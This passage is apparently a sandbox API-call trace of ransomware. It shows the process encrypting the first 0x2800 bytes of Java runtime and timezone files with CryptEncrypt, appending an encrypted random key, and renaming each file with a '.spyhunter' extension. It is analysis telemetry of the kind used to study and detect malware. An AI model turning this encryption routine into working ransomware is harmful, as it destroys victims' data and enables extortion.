returned 1 [0125.095] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0125.096] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar") returned 50 [0125.096] StrStrW (lpFirst="jfxrt.jar", lpSrch=".txt") returned 0x0 [0125.096] GetProcessHeap () returned 0x2c0000 [0125.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0125.096] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.236] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.236] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf7d4*=0x2800, lpOverlapped=0x0) returned 1 [0125.237] GetProcessHeap () returned 0x2c0000 [0125.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0125.237] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.237] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf814*, lpNumberOfBytesWritten=0x25cf7d4*=0x4, lpOverlapped=0x0) returned 1 [0125.258] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7d4*=0x30, lpOverlapped=0x0) returned 1 [0125.258] CloseHandle (hObject=0x16c) returned 1 [0125.379] GetProcessHeap () returned 0x2c0000 [0125.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.380] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.spyhunter") returned 60 [0125.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar.spyhunter")) returned 1 [0125.380] GetProcessHeap () returned 0x2c0000 [0125.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.380] GetProcessHeap () returned 0x2c0000 [0125.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.380] GetProcessHeap () returned 0x2c0000 [0125.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3e90 | out: hHeap=0x2c0000) returned 1 [0125.381] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf810 | out: pbBuffer=0x25cf810) returned 1 [0125.381] GetProcessHeap () returned 0x2c0000 [0125.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.381] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf808*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf808*=0x30) returned 1 [0125.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0125.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar") returned 47 [0125.382] StrStrW (lpFirst="rt.jar", lpSrch=".txt") returned 0x0 [0125.382] GetProcessHeap () returned 0x2c0000 [0125.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0125.382] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf7cc*=0x2800, lpOverlapped=0x0) returned 1 [0125.494] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.494] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf7cc*=0x2800, lpOverlapped=0x0) returned 1 [0125.494] GetProcessHeap () returned 0x2c0000 [0125.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0125.495] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.495] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf80c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf80c*, lpNumberOfBytesWritten=0x25cf7cc*=0x4, lpOverlapped=0x0) returned 1 [0125.585] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7cc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7cc*=0x30, lpOverlapped=0x0) returned 1 [0125.585] CloseHandle (hObject=0x16c) returned 1 [0125.585] GetProcessHeap () returned 0x2c0000 [0125.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.585] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.spyhunter") returned 57 [0125.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\rt.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\rt.jar.spyhunter")) returned 1 [0125.586] GetProcessHeap () returned 0x2c0000 [0125.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.586] GetProcessHeap () returned 0x2c0000 [0125.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.586] GetProcessHeap () returned 0x2c0000 [0125.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d930 | out: hHeap=0x2c0000) returned 1 [0125.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf808 | out: pbBuffer=0x25cf808) returned 1 [0125.595] GetProcessHeap () returned 0x2c0000 [0125.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf800*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf800*=0x30) returned 1 [0125.595] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis") returned 56 [0125.596] StrStrW (lpFirst="Tunis", lpSrch=".txt") returned 0x0 [0125.596] GetProcessHeap () returned 0x2c0000 [0125.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.596] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7c4*=0x149, lpOverlapped=0x0) returned 1 [0125.597] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.597] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7c4*=0x149, lpOverlapped=0x0) returned 1 [0125.597] GetProcessHeap () returned 0x2c0000 [0125.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.598] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.598] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf804*, lpNumberOfBytesWritten=0x25cf7c4*=0x4, lpOverlapped=0x0) returned 1 [0125.598] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7c4*=0x30, lpOverlapped=0x0) returned 1 [0125.598] CloseHandle (hObject=0x17c) returned 1 [0125.598] GetProcessHeap () returned 0x2c0000 [0125.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.598] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.spyhunter") returned 66 [0125.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tunis.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tunis.spyhunter")) returned 1 [0125.599] GetProcessHeap () returned 0x2c0000 [0125.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.599] GetProcessHeap () returned 0x2c0000 [0125.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.599] GetProcessHeap () returned 0x2c0000 [0125.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9400 | out: hHeap=0x2c0000) returned 1 [0125.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf808 | out: pbBuffer=0x25cf808) returned 1 [0125.599] GetProcessHeap () returned 0x2c0000 [0125.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf800*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf800*=0x30) returned 1 [0125.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli") returned 58 [0125.601] StrStrW (lpFirst="Tripoli", lpSrch=".txt") returned 0x0 [0125.601] GetProcessHeap () returned 0x2c0000 [0125.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.601] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7c4*=0x2dc, lpOverlapped=0x0) returned 1 [0125.602] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.602] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7c4*=0x2dc, lpOverlapped=0x0) returned 1 [0125.602] GetProcessHeap () returned 0x2c0000 [0125.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.602] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.603] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x25cf804*, lpNumberOfBytesWritten=0x25cf7c4*=0x4, lpOverlapped=0x0) returned 1 [0125.603] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7c4*=0x30, lpOverlapped=0x0) returned 1 [0125.603] CloseHandle (hObject=0x17c) returned 1 [0125.603] GetProcessHeap () returned 0x2c0000 [0125.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.603] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.spyhunter") returned 68 [0125.603] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Tripoli.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\tripoli.spyhunter")) returned 1 [0125.604] GetProcessHeap () returned 0x2c0000 [0125.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.604] GetProcessHeap () returned 0x2c0000 [0125.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.604] GetProcessHeap () returned 0x2c0000 [0125.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9340 | out: hHeap=0x2c0000) returned 1 [0125.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf800 | out: pbBuffer=0x25cf800) returned 1 [0125.604] GetProcessHeap () returned 0x2c0000 [0125.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7f8*=0x30) returned 1 [0125.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.605] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome") returned 59 [0125.605] StrStrW (lpFirst="Sao_Tome", lpSrch=".txt") returned 0x0 [0125.605] GetProcessHeap () returned 0x2c0000 [0125.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.605] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7bc*=0x41, lpOverlapped=0x0) returned 1 [0125.606] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.606] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7bc*=0x41, lpOverlapped=0x0) returned 1 [0125.607] GetProcessHeap () returned 0x2c0000 [0125.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.607] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.607] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf7fc*, lpNumberOfBytesWritten=0x25cf7bc*=0x4, lpOverlapped=0x0) returned 1 [0125.607] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7bc*=0x30, lpOverlapped=0x0) returned 1 [0125.607] CloseHandle (hObject=0x17c) returned 1 [0125.607] GetProcessHeap () returned 0x2c0000 [0125.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.607] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.spyhunter") returned 69 [0125.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Sao_Tome.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\sao_tome.spyhunter")) returned 1 [0125.608] GetProcessHeap () returned 0x2c0000 [0125.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.608] GetProcessHeap () returned 0x2c0000 [0125.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.608] GetProcessHeap () returned 0x2c0000 [0125.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9280 | out: hHeap=0x2c0000) returned 1 [0125.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf800 | out: pbBuffer=0x25cf800) returned 1 [0125.609] GetProcessHeap () returned 0x2c0000 [0125.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7f8*=0x30) returned 1 [0125.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.609] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo") returned 61 [0125.609] StrStrW (lpFirst="Porto-Novo", lpSrch=".txt") returned 0x0 [0125.609] GetProcessHeap () returned 0x2c0000 [0125.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.609] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7bc*=0x4d, lpOverlapped=0x0) returned 1 [0125.611] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.611] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7bc*=0x4d, lpOverlapped=0x0) returned 1 [0125.611] GetProcessHeap () returned 0x2c0000 [0125.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.611] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.611] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x25cf7fc*, lpNumberOfBytesWritten=0x25cf7bc*=0x4, lpOverlapped=0x0) returned 1 [0125.612] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7bc*=0x30, lpOverlapped=0x0) returned 1 [0125.612] CloseHandle (hObject=0x17c) returned 1 [0125.612] GetProcessHeap () returned 0x2c0000 [0125.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.612] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.spyhunter") returned 71 [0125.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Porto-Novo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\porto-novo.spyhunter")) returned 1 [0125.613] GetProcessHeap () returned 0x2c0000 [0125.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.613] GetProcessHeap () returned 0x2c0000 [0125.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.613] GetProcessHeap () returned 0x2c0000 [0125.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebaa70 | out: hHeap=0x2c0000) returned 1 [0125.613] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7f8 | out: pbBuffer=0x25cf7f8) returned 1 [0125.613] GetProcessHeap () returned 0x2c0000 [0125.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.613] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7f0*=0x30) returned 1 [0125.613] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.614] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou") returned 62 [0125.614] StrStrW (lpFirst="Ouagadougou", lpSrch=".txt") returned 0x0 [0125.614] GetProcessHeap () returned 0x2c0000 [0125.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.614] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7b4*=0x41, lpOverlapped=0x0) returned 1 [0125.615] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.615] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7b4*=0x41, lpOverlapped=0x0) returned 1 [0125.615] GetProcessHeap () returned 0x2c0000 [0125.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.615] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.615] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf7f4*, nNumberOfBytesToWrite=0x4, 